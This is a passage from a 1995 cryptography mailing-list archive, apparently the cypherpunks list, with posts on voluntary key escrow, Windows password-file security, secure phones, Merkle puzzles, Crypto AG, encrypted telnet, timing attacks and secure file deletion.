agents if they can still >thumb their noses at the LEAs? I disagree. The issue is one that might be called "standing." Who, exactly, is responsible to whom in such an arrangement. Let's suppose key escrow (for keys for non-exported encryption devices) is REALLY VOLUNTARY. In that case, the escrow agent's only legal responsibility is to the owner of the encryption device. The government isn't a party to this voluntary arrangement, and thus hasn't a complaint if the escrow agent refuses to comply. I could, for example, enter into a voluntary arrangement with an escrow agent so that he would be obligated to erase the key no more nor less than 5 days after he received it. If he did so 1 day after, and I needed the key, he would have breached his obligation to ME, but not to the government. Likewise, if he failed to erase the key, he would likewise be breaching his agreement with me. Unfortunately, I think you've fallen into the too-common trap of assuming that the government can insist, unilaterally, on people's behavior even absent laws which specifically require or prohibit specific performance. > The proposal is talking about throwing >CERTIFIED ESCROW AGENTS in jail for not complying with the authorities and >has absolutely nothing to do with users like you. But you haven't established that an "escrow agent" has any duty to the government. > I don't see how a system >where you don't have to register your keys but the escrow agents can be >imprisoned for not releasing a key in their possession is any less voluntary >to you. It _is_ less voluntary, because it interferes with my right to escrow my key with an organization that is willing to take the dispute to arbitrary levels of uncooperativeness with the government. I might insist, for example, that the organization only store the key outside the country (beyond the reach of US Courts) and require MY PERMISSION for them to release it to the government. I might also insist that they further encode the key so that only an independent foreign organization (out of reach of US courts) could provide the key to decrypt it. If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary restrictions should be do-able. >Certainly the whole escrow thing is a sham and it couldn't possibly work if >it were really voluntary (witness the documents FOIA'ed from the FBI...). Yes but... > We >all know that but there isn't anything sinister in the escrow agent >requirement for releasing keys under penalty of law Yes, there is. I STILL refuse to accept the idea that a "key escrow agent" (if he's keeping a VOLUNTARILY escrowed key, one not for export) must automatically be considered to be subject to the whim of government orders. > Believe me, if we continue to have >voluntary GAK with no escrow agent requirements or certification when (if?) >Mandatory GAK comes down the escrow agent certification and penalties will >most definitely be part of the deal. So I wouldn't worry about quibbling >over the voluntaryness just because of the proposed escrow agent >requirements. Here's why you're wrong. The government wants us to accept an arrangement they've described as "voluntary." (Naturally, we will refuse.) It is better to be able to show that we're refusing BECAUSE THEY'RE LYING about the "voluntaryness" of the system, because that makes us appear reasonable (which we are) and them appear unreasonable (which they are.) Playing along with their their assertion that the system is "voluntary" would make it look like it is we who are being unreasonable. So the position I'll take is this: "You claim you are willing to accept that the system be 'voluntary.' Okay, the only thing I'll tolerate is one which has the maximum number of 'voluntary' aspects. Anything less and you're lying." I'd insist, for example, on the unfettered ability to turn off the key escrow "feature" on the telephone (with a switch on the side, labelled "Good encryption vs. Big Brother's listening". I'd insist on its ability to talk to other telephones which have to corresponsing key escrow. Etc, etc, etc. If they resist, we can then say, "Oh, you must have been LYING about this system being voluntary! SO what else are you lying about?!? I think you're being unreasonable, so I have no intention of complying with ANY of your requests, however reasonable they may appear to be on the surface, because I cannot trust you!" And _THAT_ would obviously be a reasonable position. The key, however, is that we must expose the lying, and to do that we must use whatever inconsistencies we can. This is not "quibbling": It is establishing the credibility (or lack of it) of THE ENEMY. From llurch at networking.stanford.edu Sat Dec 16 00:13:14 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Sat, 16 Dec 1995 16:13:14 +0800 Subject: .PWL spin In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 15 Dec 1995, Rev. Ben wrote: > > What would make a University less secure than a corporation?? > > Ostensibly, universities in the interest of academic freedom and > promoting learning usually don't have nearly the same draconian measures > that corporations have. More to the point, us poor professional staff don't stand a chance politically against students and faculty. We support whatever they want to use. I think it's more an issue of control. Ford IS can say Thou Shalt Not turn on SAP advertisement, and people will listen (or go away). At major Universities, what we do with troublemakers is, we hire them. But back to the point, the anonymous (cypherpunk relevance) "system administrator" (guess they couldn't find anyone willing to make a fool of himself on the record?) who said that Universities would be hurt more was wrong. We just don't have passwords on Win95 machines, or don't care if they're compromised. It's the people at Ford, Dow, and Sprint, which had wasted man-years putting together "policies" and "user profiles" that have proven to be worse than useless, who are pissed off. > Anyone want to give a college grad a job? Actually, yes. Low $40's (consider CA cost of living), direct user support, but high level of freedom. You're probably overqualified, though. - -rich -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNH4PI3DXUbM57SdAQGy0QP/R/KG1cdZDru06vArZdTiO05/RRsg29Lv lrrpoEfoLQmIktsilObBX00J/CQPd667UkfD/s1DYR8nzdsbrbZG9M3iOU5I5r/m aDjdkBfQ1aRCfYNV+eiXen4MuuwXhWt/Hs++9bdfqiWhIIS1E3sRxK8emFIgXzm1 0o72frQsBXw= =4EHv -----END PGP SIGNATURE----- From jim at bilbo.suite.com Sat Dec 16 01:05:29 1995 From: jim at bilbo.suite.com (Jim Miller) Date: Sat, 16 Dec 1995 17:05:29 +0800 Subject: Java scripts to caputure remote timing info? Message-ID: <9512152146.AA08898@bilbo.suite.com> I don't enough about Java to know if it is possible, but it's something to think about. Jim_Miller at suite.com From acb at cs.monash.edu.au Sat Dec 16 01:14:22 1995 From: acb at cs.monash.edu.au (Andrew C Bulhak) Date: Sat, 16 Dec 1995 17:14:22 +0800 Subject: QUERY: e-politics mailing list In-Reply-To: Message-ID: <199512160844.TAA07942@molly.cs.monash.edu.au> [Giles Bowkett] > > Does anyone know of a mailing list organized around political issues > regarding electronic networks, virtual community, the changing roles of > the city and the corporation, and especially issues of class in a "wired" > world? > > Much thanx, pls pardon the spam. > > PS - be careful about replying to all recipients - this message went to a > couple different lists. If there are issues which specifically concern you (as I assume there are), why not start your own list? Does ripco have a list server? If so, ask the admin to set up a list for you. -- acb at cs.monash.edu.au If you call this a signature, you oppose its acb at dev.null.org reality. If you do not call it a signature, http://www.zikzak.net/~acb you ignore the fact. Now what do you wish to Disclaimer: Or something... call it? From tcmay at got.net Sat Dec 16 02:38:12 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 16 Dec 1995 18:38:12 +0800 Subject: e$: Seven Days Message-ID: At 2:32 AM 12/16/95, Robert Hettinga wrote: [much elided] >This is an honest-to-goodness, straight out of the Whole-Earth Domebook, >back to the land, llamas-and-all geodesic dome, complete with naked >hippies in the hot tub. I come to the conclusion that this is going to I was one of the "naked hippies in the hot tub," for a couple of hours or so. >This chair now had another guy sitting in it, and, as I had been doing >all evening, I introduced myself, by way of retrieving my Powerbook. It >was Tim May. > >I laughed, and shook his hand goodbye, which must have puzzled him a >bit, got my Mac from behind him, and split. Tim May looks much >different in person than he does on the net. On the net, he's this >short, skinny-but-muscular, pushy guy with no beard who looks too young >for his age. In person, he's exactly the opposite on all counts. Gooo >figure. ??? Yes, I was surprised it was Bob, as I hadn't heard he was there. But, then, I had been in the hot tub and was in a state of torpor even afterwards. Also, I tend to sit and not partake of the frenzied shmoozing which so often occurs at these parties. I probably would've encountered Bob earlier if people were doing what I urge them to do at my parties: wear name tags. (I have a pile of name tags and suggest to people that wearing them is completely "voluntary" in the true sense--not the Newspeak GAK sense--and that they can of course choose to remain unknown to others. This helps greatly in recognizing and remembering names, and it's too bad name tags have been tagged as "uncool" by so many.) I guess to an outsider this party at the geodesic dome in the Santa Cruz mountains must've seemed like the canonical California experience, complete with hot tubs, redwoods, programmers, writers, etc. To us, it's just normal. By the way, in honor of the "geodesic network" and "geodesic payment systems," and the geodesic dome the party was in, I propose we rename "e$" with a more fitting name: "buckybucks." Or just "buckys" for short. ("Did you remember to replenish the buckybits?") --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From sameer at c2.org Sat Dec 16 02:57:12 1995 From: sameer at c2.org (sameer) Date: Sat, 16 Dec 1995 18:57:12 +0800 Subject: Motorola Secure Phone In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net> Message-ID: <199512160034.QAA15353@infinity.c2.org> My AT&T 900 (or is it 9000?) MHz digital cordless phone says the same thing. I figure it uses a weak cryptosystem. There is something about key setup when you return the handset to the base. (The phone was $200, FWIW) > > > I saw a new cordless phone made by Motorola in a retail outlet today > that is supposedly "Secure from eavesdroppers." I asked the > salespeople for more technical info, but they weren't very helpful. > Does anyone have any information on this? I didn't notice any "Not > for Export" stickers on the box, and the ITAR does cover > spread-spectrum technology. So is it analog or digital? Is it just > doing simple analog tricks, or is it encrypting a bitstream? Clipper > maybe? I doubt it. Any info appreciated. > Dan > > *************************************************************** > #define private public dan at milliways.org > Worcester Polytechnic Institute and The Restaurant at the End of the Universe > *************************************************************** > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From tallpaul at pipeline.com Sat Dec 16 03:32:42 1995 From: tallpaul at pipeline.com (tallpaul) Date: Sat, 16 Dec 1995 19:32:42 +0800 Subject: The Elevator Problem & Groucho's Duck Message-ID: <199512160537.AAA23233@pipe6.nyc.pipeline.com> On Dec 14, 1995 04:44:12, 'futplex at pseudonym.com (Futplex)' was kind enough to respond to my post on the elevator problem. I thought his response was insightful and appropriate but that the description of the problem had changed a bit since the problem was first posed. Thus this post. I've been thinking of the old game show hosted by Groucho Marx. You would "say the secret word and win $100." Getting the $100 was easy. The duck would drop down on a string with the money in its beak and you'd just pluck it out. Saying the secret word was also an easy problem to hack. You could just read the dictionary. Of course this hack didn't work in real time because the show only lasted 30 minutes, Groucho did most of the talking, and you had to say the secret word in normal conversation. All of this rather "limited the bandwidth." The elevator problem remains somewhat undefined as a problem. Several parameters are boundaries within which the basic problem must be solved. Two parameters are the length of time Alice and Bob will spend coupled against the desired level of security. Highly specific solutions are effectively impossible until these parameters are defined (or at least approximated). However ... My original solution involved a variation of Merkle's non-patented puzzles. Futplex stated, correctly, that this took a goodly amount of time to generate and transmit the puzzles and the security was "not so hot." My mind still returns to Merkle and the idea of solving the original elevator problem that could be geometric for Alice and Bob while being exponential for the other people on the elevator. The more I tried to focus on this aspect of the problem the more I just repeated the problem in my own mind. I felt that I was trapped in a "maze of twisty little passages, all the same." At this point, this holiday season, I had an image of Merkle sitting by the tree putting an infinite number of prime numbers in an infinite number of boxes. (In the real world I've been fighting with my landlord and suddenly thought of Cantor's first description of the landlord's dilema where a landlord has an infinite number of rooms, all full, when another guest shows up and wants a room.) At this point, I suddenly had an image of Cantor sitting on the floor next to Merkle. Merkle would pack an infinite number of boxes and hand each box to Cantor who would proceed to wrap each box in an infinite number of sheets of wrapping paper. Suddenly, I saw that my first suggested solution put all of the major work on Alice. She had to generate 10^6 prime pairs and send them all to Bob then brute force an average of (10^6)/2 attempts to discover the one pair Bob picked ot factor. This process *might* be speeded up if Bob would, Cantor-like, help out. In other words, have Alice generate and transmit 10^3 prime pairs and have Bob do the same. This cuts transmission time by 5*(10^5), a considerable savings. Then Alice and Bob each have to brute force an average of 5*(10^2) attempts to discover each others primes, for a similar savings. However, you still need a nonpatented algorythm that lets them use the four primes to encypher their message(s) while forcing the others on the elevator to factor an average of (10^3^2)/2 products instead of 2*((10^3)/2). This is still very far from a solution to the elevator problem as re-posed by Futplex but creates at least one way of *potetentially* shortening the prime generation and transmission time issue he was kind enough to point out. I now feel that I am only "trapped in a maze of twisty little passages, all different." Comment, Futplex? --tallpaul From john.ellis at wmcmail.wmc.ac.uk Sat Dec 16 04:33:31 1995 From: john.ellis at wmcmail.wmc.ac.uk (john.ellis at wmcmail.wmc.ac.uk) Date: Sat, 16 Dec 1995 20:33:31 +0800 Subject: Algorithims ? Message-ID: <9511158190.AA819065181@wmcmail.wmc.ac.uk> Were can i get a set of the most popular algorithims from for encryption, and does any one have and info on the algorithim used in the second WW by the germans, (The Enigma system) any info would be greatfully recieved Cheers John From joelm at eskimo.com Sat Dec 16 08:34:53 1995 From: joelm at eskimo.com (Joel McNamara) Date: Sun, 17 Dec 1995 00:34:53 +0800 Subject: DEC Alta Vista Message-ID: <199512161557.HAA25530@mail.eskimo.com> Check out Digital's new Web and newsgroup search engine at: http://www.altavista.digital.com/ Makes OpenText, Lycos, etc. look like turtles. Crypto-relevance: The spider they used appears to have fully indexed the HTML Cypherpunk list archive. Extremely fast searches on your favorite topics... Joel From andreas at artcom.de Sat Dec 16 12:29:28 1995 From: andreas at artcom.de (Andreas Bogk) Date: Sun, 17 Dec 1995 04:29:28 +0800 Subject: Balto Sun Followup: Crypto AG a friend of Cypherpunks? In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >>>>> "Peter" == Peter Wayner writes: Peter> My favorite detail, however, was the hint that the rumors Peter> are a "well conceived ploy" to harrass a company that is Peter> making strong crypto for independent countries. So maybe Peter> they're cypherpunks? Nope. They're owned by the Federal Republic of Germany. They deliver all cryptographic equipment for all TLAs in Germany. They're about as much cypherpunks as the NSA is. Andreas -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAgUBMNMfGEyjTSyISdw9AQHr9QP7Bojhmn/xsG92xZh9KWM6Dilon56M8oF4 roIe27SwF+Fmj8G72bK7TcgIPizpvhraT5O4/270pEvkbakYeAADbA5+K5cf3XbC TLvZkqBtBHwJx56nyExfJdKDPD3cQlxymg2oj+8DzCq8f9Z4yUZrumvNjeAIlIks bmJJ/11y1wU= =1xSy -----END PGP SIGNATURE----- From jimbell at pacifier.com Sat Dec 16 13:19:38 1995 From: jimbell at pacifier.com (jim bell) Date: Sun, 17 Dec 1995 05:19:38 +0800 Subject: NIST GAK meeting writeup, LONG part 3 of 3 Message-ID: At 08:48 PM 12/14/95 -0500, you wrote: >jim bell writes: >> It _is_ less voluntary, because it interferes with my right to escrow my key >> with an organization that is willing to take the dispute to arbitrary levels >> of uncooperativeness with the government. I might insist, for example, that >> the organization only store the key outside the country (beyond the reach of >> US Courts) and require MY PERMISSION for them to release it to the >> government. I might also insist that they further encode the key so that >> only an independent foreign organization (out of reach of US courts) could >> provide the key to decrypt it. >> >> If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary >> restrictions should be do-able. > >Unless I've missed something large, you can have an _uncertified_ key escrow >agent store your keys in Fidel Castro's beard, and only release them with >written permission from your goldfish. > >Whether or not you use a certified key escrow agency would remain your >choice, AFAIK. > >I'm not expressing support for the certification standards that have been >presented. But I don't consider it cause for great alarm that the USG wants >to play in the escrow agent rating bureau business. Here's the problem: "Clipper" ALREADY isn't "voluntary," because the public has already been forced to pay for its development via stolen tax dollars. At least hypothetically, the government could misuse its discretion even further to push a Clipper-like solution, in order to skew the market against the adoption of good encryption. Follow me so far? They could go as far as to subsidize Clipper-installed telephones, making them cost &50 at your local discount store, competitive with non-crypto phones. Okay, I presume that the company that makes Clipper chips (VLSI Technology) must ultimately sell them, UNPROGRAMMED, to manufacturers who are to build those telephones. I see a business opportunity to act as a VOLUNTARY escrow agent, but one that only agrees to keep the keys for the chips for "30 feet or 30 seconds." In other words, build (or modify) Clipper-type telephones with chips that are ostensibly escrowed, but due to the agreement with the end user the keys will be erased. (Or, the keys will be kept encrypted, unbreakably, with the "key to the key" given to the end user, who will presumably burn it on receipt.) What I _DON'T_ want to see happen is for the USG to be able to refuse escrow-agent status to an organization which is actively hostile to the concept of key escrow, an organization which is willing to work with end-users to thwart the USG's access to products which (due to the fact they were never exported) do not fall under any ITAR-type regulations. From jimbell at pacifier.com Sat Dec 16 13:50:59 1995 From: jimbell at pacifier.com (jim bell) Date: Sun, 17 Dec 1995 05:50:59 +0800 Subject: Netscape announces position against GAK Message-ID: At 01:16 AM 12/9/95 -0800, you wrote: >http://home.netscape.com/newsref/ref/encryption_export.html > >> NETSCAPE PRESENTS POLICY ON ENCRYPTION EXPORT TO KEY MEMBERS OF THE >> ADMINISTRATION AND CONGRESS >> >> ---------------------------------------------------------------------- >> >> This week Netscape representatives attending a government presentation >> of the administration's proposed Key Escrow Policy for Export detailed >> the company's firm opposition to the proposed policy. Netscape is >> opposed to this type of proposal for a number of reasons including its >> failure to adequately address the issues of acceptability by foreign >> governments and corporations, significant personal privacy concerns, >> and the mandatory nature of tying the Exportable Key Size to the Key >> Escrow Proposal. [rest of position deleted] While this may be a reasonably good start, what I would have preferred that you say is that if any kind of GAK system is adopted, either foreign or domestic, you as a corporation would ENTHUSIASTICALLY do everything in your power to (_legally_) circumvent, undermine, sabotage, neutralize, and counteract whatever goals the US government has with reqard to implementing GAK. In other words, while you might stay barely within the letter of the law, you would tirelessly exploit every possible loophole (both legal and technical) to ensure that the government NEVER gets its way. I feel certain that with a few imaginative lawyers and programmers (both foreign and domestic), it should be possible to turn this into a "nightmare scenario" for the government. From cmcurtin at goffer.cb.att.com Sat Dec 16 14:20:06 1995 From: cmcurtin at goffer.cb.att.com (C Matthew Curtin) Date: Sun, 17 Dec 1995 06:20:06 +0800 Subject: Encrypted telnet... In-Reply-To: <9512151848.AA20590@spirit.aud.alcatel.com> Message-ID: <9512162147.AA04565@goffer.cb.att.com.cb.att.com> -----BEGIN PGP SIGNED MESSAGE----- Dan> I am looking for an encrypted telnet (or rlogin/etc) package Dan> that supports a Windoze client. You might want to check into STEL from CERT-IT; in their paper describing it, they note that ports exist (as of June '95) on HPUX, SunOS, IRIX, Solaris, and Linux. Since you mentioned an interest in hacking some code yourself, you might want to see if you could make a Windows port of their client. STEL should be available via anonymous ftp at ftp://ftp.dsi.unimi.it/pub/security/cert-it/stel.tar.gz CERT-IT can be found on the web at http://idea.sec.dsi.unimi.it/cert-it.html ...and the authors of the STEL paper, and their email addresses are: David Vincenzetti vince at dsi.unimi.it Stefano Taino taino at dsi.unimi.it Fabio Bolognesi bolo at dsi.unimi.it - -matt -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNM+fBhyYuO2QvP9AQFarAP6A8wZqzf3sCCKmloZOTiWQRIv/puvUwmq 5wn1t0tzosMRW2VeKhluAwd/cNMywe0j4mpRzBLDKXgXp5/lMMR+99yAgXnRLXgK 7WHG4Qgvx/IMFLl0rOfvOpkDoLvXk4fWYM0gU8eTEf8Vja/ZsTo9rJ1Tq/JlRpn9 Mo4Z/QYFzMM= =cezv -----END PGP SIGNATURE----- From jadestar at netcom.com Sat Dec 16 14:56:40 1995 From: jadestar at netcom.com (JaDe) Date: Sun, 17 Dec 1995 06:56:40 +0800 Subject: DEC Alta Vista In-Reply-To: <199512161557.HAA25530@mail.eskimo.com> Message-ID: <199512162218.OAA06706@netcom21.netcom.com> > > Check out Digital's new Web and newsgroup search engine at: > > http://www.altavista.digital.com/ > > Makes OpenText, Lycos, etc. look like turtles. > > Crypto-relevance: The spider they used appears to have fully indexed the > HTML Cypherpunk list archive. Extremely fast searches on your favorite > topics... > > Joel I'm impressed. I accessed it in Lynx and it was *perfect* -- not a single inline without an appropriate Alt= attribute. As a quick test I did a search on something that I new I'd posted to the comp.lang.awk newsgroups within that last couple of days. It found them almost instantly (except that it was apparently arranged chronologically -- so I had to hunt through several pages of [Next Set of Matches] links to find my stuff. (Sorry no cypher relevance I can add to this -- but put that URL in your bookmarks folks). From vznuri at netcom.com Sat Dec 16 15:01:12 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Sun, 17 Dec 1995 07:01:12 +0800 Subject: More Balto Sun on the NSA: Infowar In-Reply-To: Message-ID: <199512162211.OAA07646@netcom23.netcom.com> PW on the NSA: >The article also has some anecdotes about how the agency >protected US firms abroad. One company was alerted that its >European competitor was bribing the Latin American officials who >were choosing the winning bid. Also, when the Peso collapsed, >the US negotiators had access to some information that the >Mexican government wasn't being as forthcoming as they should >have been about the country's assets. They used this information >in negotiations. I'd like to point out how specious this supposed "benefit" is if the NSA is actually now involved in economic espionage areas as this implies. (@#$%^&*, I must have missed the senate meeting where they modified the charter, maybe it was the same one where they came up with Clipper) suppose you get a message from our government with the implication it came from the NSA: "Mr. businessman, we have information that so-and-so bidder is involved in bribery". well, what can you do with this? why should you give it any merit? the NSA has its own hidden agenda. they could saying things to netscape like, "so-and-so cryptography is not secure. don't use it". should netscape listen to them? isn't it obvious there could be a conflict of interest, to say the least, and a delightful opportunity for further spook "shadow" manipulation techniques, which they get their wet dreams about? the problem is that many businessmen are just as gullible and braindead as the american public, and will roll over or listen with rapt attention just like americans do when they hear the phrase, "national security". there are many businessmen who think they are being "patriotic" by listening to their government and cooperating with it in shadowy deals for the purpose of promoting "national security". frankly I think this is as close to being a traitor to the true spirit of democracy as one can come without ever being considered one by rational adults. (oh, well, the distinction about rational adults has somewhat blurred in this century..) Eisenhower's "military industrial complex" actually has the initials NSA.. so frankly, I would recommend that any businessmen who get "shadow" tips from the government about how to run their business like PW describes to tell them to ---- off. unless you're a patriot of course. then you should turn me in for writing this message. if the government actually had proof about their claims, that would be a different story. then I'd tell them to "---- off" *after* I got the relevant info .. but seriously this is not going to be a problem with spooks, who love the following style of proof and information transmission: "[x] is true because we know it is true, but exactly why is a matter of national security which we can't tell you. nevertheless because of [x] you should do [y]. in fact you are compelled to do it as a US patriot." just call it "proof by spook phlegm" that's what we now have: a government of, by, and for the @#$%^&* spooks. From jeffg at hiwaay.net Sat Dec 16 15:02:27 1995 From: jeffg at hiwaay.net (Jeff A. Gehlbach) Date: Sun, 17 Dec 1995 07:02:27 +0800 Subject: .PWL Spin Message-ID: <9512160238.AA15186@fly.HiWAAY.net> -----BEGIN PGP SIGNED MESSAGE----- At 02:01 PM 12/15/95 -0600, you wrote: >According to rumor, anonymous-remailer at shell.portal.com said: >> On Sat, 9 Dec 1995, Joel McNamara wrote: >> What would make a University less secure than a corporation?? > >1) Usually more net connected hosts. >2) Lack of adequate sysadmin attention/knowlege. >3) Vague and poorly enforced site security policies. IMHO Microsoft has no concern about the security of any university; educational institutions will standardize on whatever OS the majority of their students are familiar with (=Windows whatever). No, the big priority in Redmond is winning (and keeping) corporate customers. A corporation can standardize around whatever the management likes. A large Virginia-based metals corporation recently standardized on the M$ Office suite with little regard to the hundreds of users who had already effectively entrenched with WordPerfect. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNIxEY8AYvAI/GnhAQEveQQAtyPwljkPyBCyeD0fv5Bb83TQ4UX6P+g4 tqgQSH+7LpYORHxJvMmWVTocUHWdo+rkx8AngFPvhF9fTl6DB1Qyd8RzeL0Od0f9 WJOcbi5BtS/sqbmU82XWypohk5FCE3fMKCvkCMpNy6ptuvbwLBHmastJxt0FJ8kO wwWQENHp6sg= =O/P9 -----END PGP SIGNATURE----- From pcw at access.digex.net Sat Dec 16 15:02:35 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 17 Dec 1995 07:02:35 +0800 Subject: Balto Sun Followup: Crypto AG a friend of Cypherpunks? Message-ID: In an earlier posting, I summarized an article in the Baltimore Sun about the Swiss company Crypto AG that makes encryption machines for the world market. The newspaper ran a follow up article today (12/15/95) that discussed a two page statement issued by Crypto AG. Some of the quotes from the statement that made it into the Baltimore Sun article are: "Pure Invention" "old hearsay" "The allegations are not new at all and just repeat tales which date back 25 or more years" [Crypto AG] "has no political ambitions or claims." My favorite detail, however, was the hint that the rumors are a "well conceived ploy" to harrass a company that is making strong crypto for independent countries. So maybe they're cypherpunks? The rest of the Baltimore Sun article goes on to summarize why the paper printed what it did. These include interviews with apparently anonymous sources identified as "several former Crypto engineers." These engineers told the Sun that they were forced to make design changes by their boss based upon "technical documents provided by mysterious visitors to the Zug plant." -Peter Wayner If you care about this matter, you should dig up the original article from the Baltimore Sun. $3.95. Dial 410-332 6962. From jk at digit.ee Sat Dec 16 15:15:54 1995 From: jk at digit.ee (Jyri Kaljundi) Date: Sun, 17 Dec 1995 07:15:54 +0800 Subject: Motorola Secure Phone In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net> Message-ID: What about cellular phones, especially GSM? As I have heard GSM is supposed to be secure, at least thats what the salespersons tell every time they are selling a GSM. I know ciphering algorithms A3, A8 and A5 are used in GSM phones, but I know nothing more about them. J�ri Kaljundi jk at digit.ee Digiturg http://www.digit.ee/ From jmb at FreeBSD.ORG Sat Dec 16 16:01:27 1995 From: jmb at FreeBSD.ORG (Jonathan M. Bresler) Date: Sun, 17 Dec 1995 08:01:27 +0800 Subject: kocher's timing attack In-Reply-To: <199512151457.GAA27245@jobe.shell.portal.com> Message-ID: On Fri, 15 Dec 1995, Hal wrote: > As Kocher's paper implies, the known ciphertext attack is a TIMING > attack. Simply accumulating known text/signature pairs as you would have > after a "key signing party" does not help. You must know exactly how > much time each signature took. how to use a timing attack? across a network? on the same host (therefore multiuser)? or on a dedicated host, with a know algorithm and known ciphertext running DOS (no kernel or anything to preempt the process)? using the famous appendix H registers of a 586 allows you to time the processing of instructions very well. dont have to know how long it takes to encrypt ahead of time. walk the key bit by bit (ouch bad pun) guessing 1 or 0 each time and looking to see if the correlations continue to appear or not. horrendous problem, but a lot better than brute force. i really need to read the final paper when it is issued. jmb Jonathan M. Bresler FreeBSD Postmaster jmb at FreeBSD.ORG play go. ride bike. hack FreeBSD.--ah the good life i am moving to a new job. PLEASE USE: jmb at FreeBSD.ORG From ericande at cnw.com Sat Dec 16 16:25:08 1995 From: ericande at cnw.com (Eric Anderson) Date: Sun, 17 Dec 1995 08:25:08 +0800 Subject: taking electronic privacy into our own hands Message-ID: <01BACBCB.01742B20@king1-21.cnw.com> Would it be possible to write a program ( i.e. a worm or Trojan) to ferret out personal information that is stored in databases and encrypt it? I was just wondering what such an undertaking would entail. Eric From holovacs at styx.ios.com Sat Dec 16 16:26:12 1995 From: holovacs at styx.ios.com (Jay Holovacs) Date: Sun, 17 Dec 1995 08:26:12 +0800 Subject: Is ths legal?... Message-ID: I was told today that students at Oklahoma University have their computer accounts subject to administrative inspection and that encryption (even email) without escrow is prohibited. Maybe the story is not quite straight but federal law supposedly protects personal electronic communication and I somehow don't think OU can overide this simply because it passes thru their computers. Sounds like another job for PGP. Jay Holovacs PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 (KEY id 1024/80E4AA05) email for key From tallpaul at pipeline.com Sat Dec 16 18:01:28 1995 From: tallpaul at pipeline.com (tallpaul) Date: Sun, 17 Dec 1995 10:01:28 +0800 Subject: Is ths legal?... Message-ID: <199512170131.UAA03707@pipe6.nyc.pipeline.com> On Dec 16, 1995 18:37:05, 'Jay Holovacs ' wrote: >I was told today that students at Oklahoma University have their computer >accounts subject to administrative inspection and that encryption (even >email) without escrow is prohibited. Maybe the story is not quite straight >but federal law supposedly protects personal electronic communication and >I somehow don't think OU can overide this simply because it passes thru >their computers. > First, it may not be true. Second, if it is true, people frequently define the ability to do something as a "privledge" not a "right." As in a hypothetical "Use of student accounts at O.U. is a privledge extended to the students by the University. By using our computer you keep to our rules, including abandoning any notion you might have that your communications are in any way private" etc. etc. --tallpaul From hayden at krypton.mankato.msus.edu Sat Dec 16 20:40:44 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Sun, 17 Dec 1995 12:40:44 +0800 Subject: Is ths legal?... In-Reply-To: <199512170131.UAA03707@pipe6.nyc.pipeline.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 16 Dec 1995, tallpaul wrote: > Second, if it is true, people frequently define the ability to do something > as a "privledge" not a "right." As in a hypothetical "Use of student > accounts at O.U. is a privledge extended to the students by the University. > By using our computer you keep to our rules, including abandoning any > notion you might have that your communications are in any way private" etc. > etc. I believe there is a supreme court case that essentially says that a public entity cannot define something as either privledge or right. I'm not sure the name, but the EFF has an abstract available. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMNN6WjokqlyVGmCFAQG6BwQAqqJhzk7BzJ+9Gmbl8Esf+8zcxVzEfAw+ GgPr8AMNz0KzgkOHDZsQOwqFM5wVqkpk8bzSUTCHu5YW8/ORfXHB7b/lmn03qkBd ZZFEldfhoZFINfm4tdAd/8YfWF0WZeXiuDsRqJA/V4iRyIRj9+axpUPOFefDqkMD gQR8KyPuSrw= =Wagv -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+** ------END GEEK CODE BLOCK------ From jirib at sweeney.cs.monash.edu.au Sat Dec 16 20:58:04 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Sun, 17 Dec 1995 12:58:04 +0800 Subject: Secured RM ? (source) In-Reply-To: <9512151425.AA07871@monad.semcor.com> Message-ID: <199512170428.PAA22362@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello jps at monad.semcor.com (Jack P. Starrantino) and cypherpunks at toad.com ... > I think you can work this way if you open the file for read/write > access, although I'd be more inclined to take the file name into the > directory and then walk the inodes. Yuck! Opening the file for read/write should be ok on all filesystems where walking the inodes is doable and ok, and will be more portable. Walking the inodes has the advantage that it won't run out of disk space, but I suspect confidential files with holes will be rare. There's no automatic rm that will also delete all backups of the file. (You are keeping backups, aren't you?) Hope I'm making sense... Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP 